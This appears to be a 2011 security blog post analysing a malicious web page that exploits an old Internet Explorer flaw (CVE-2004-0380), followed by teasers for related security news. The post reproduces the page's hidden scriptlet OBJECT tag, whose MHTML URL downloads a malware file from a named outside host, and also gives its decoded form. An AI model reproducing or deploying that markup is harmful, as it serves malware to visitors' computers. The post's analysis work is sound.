Some exploits just do not want to go away.
Case in point is an exploit for
CVE-2004-0380
(yes, 2004!) that I have recently found in
hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:
<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
data="MK:@MSITStore:m
html:c:\.mht!ht
tp://http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>
The object tag instantiates a
scriptlet.
A scriptlet is essentially a reusable object written as a regular web
page in which scripts follow certain conventions. Think of ActiveX
controls implemented in HTML and VB script. For the sake of historical
completeness,
scriptlets were introduced in Internet Explorer 4, deprecated in
Internet Explorer 5, and disabled by default in Internet Explorer 7.
Talk about a successful technology…
After a simple decoding step, the data attribute of the scriptlet
reveals the content
MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg
::/102.htm, which, on a vulnerable system, would cause the malware
logo.gif to be downloaded on the victim’s computer.
The malware logo.gif has surprisingly good detection on
VirusTotal
(34/41!). I wonder if it is also been around since 2004…
Related Posts
- Old exploit still kicking (CVE-2004-0380)
Some exploits just do not want to go away.
Case in point is an exploit for
CVE-2004-0380
(yes, 2004!) that I have recently found in
hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:
&l... - Poisoned Google image searches becoming a problem
If you are a regular user of Google's search engine you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its be... - Firefox 4 gets its first security update
Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser's first-ever security update. The Firefox version number bumps up to 4.0.1.The update fixes 50-odd bugs in... - Web Security Gets Another Reality Check
On April 11, Malaysian hackers embarrassed Barracuda Networks by exploiting code vulnerability through an SQL injection and triumphantly posting names, email addresses, and passwords belonging to Barr... - Hundreds of College and Government websites still redirecting to fake stores
In January, I talked about high-profile websites, which had been hacked to redirect users to fake online stores. One unique aspect of the hack was the fact that the attackers had set up additional web... - Limit Flash Exploit Exposure, Uninstall ActiveX Version
Yesterday, Adobe issued Security Advisory APSA11-02. The advisory states that:"A critical vulnerability exists in Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 a... - USPS.gov Website Infected with Blackhole Exploit Kit
Update (04/07/2011 10:03am PST): USPS officials have taken the http://ribbs.usps.gov web site down to address the infection.
A United States Postal Service website (http://ribbs.usps.gov) has b... - LizaMoon, Etc. SQL Injection Attack Still Ongoing
We’re currently monitoring a still-ongoing mass compromise involving a great number of websites. The compromised sites have been injected with a malicious script that triggers redirects to certa... - Zbot and Black Hole Exploit Kit “all in one” fake Facebook notification Emails
Websense® Security Labs™ Threatseeker® network has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to ... - Excel File Containing Adobe Zero-Day Exploit Found
We got hold of an exploit targeting the vulnerability Adobe reported in its most recent security advisory.
The exploit, detected as TROJ_ADOBFP.B (now detected as TROJ_ADOBFP.SM), takes advantage of t...
Posted on 08 February 2011. Tags: CVE20040380, Exploit, Kicking, still
